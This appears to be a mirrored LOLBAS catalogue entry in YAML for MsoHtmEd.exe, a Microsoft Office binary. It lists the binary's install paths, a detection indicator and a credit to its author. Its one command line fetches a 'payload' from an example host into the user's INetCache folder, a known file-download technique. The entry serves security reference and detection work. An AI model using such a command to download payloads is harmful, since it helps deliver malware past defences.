mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-29 00:08:11 +01:00
35 lines
1.7 KiB
YAML
35 lines
1.7 KiB
YAML
|
---
|
||
|
Name: MsoHtmEd.exe
|
||
|
Description: Microsoft Office component
|
||
|
Author: Nir Chako
|
||
|
Created: 2022-07-24
|
||
|
Commands:
|
||
|
- Command: MsoHtmEd.exe https://example.com/payload
|
||
|
Description: Downloads payload from remote server
|
||
|
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||
|
Category: Download
|
||
|
Privileges: User
|
||
|
MitreID: T1105
|
||
|
OperatingSystem: Windows 10, Windows 11
|
||
|
Full_Path:
|
||
|
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
|
||
|
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
|
||
|
- Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
|
||
|
- Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
|
||
|
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
|
||
|
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
|
||
|
- Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
|
||
|
- Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
|
||
|
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
|
||
|
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
|
||
|
- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
|
||
|
- Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
|
||
|
- Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
|
||
|
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
|
||
|
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
|
||
|
Detection:
|
||
|
- IOC: Suspicious Office application internet/network traffic
|
||
|
Acknowledgement:
|
||
|
- Person: Nir Chako (Pentera)
|
||
|
Handle: '@C_h4ck_0'
|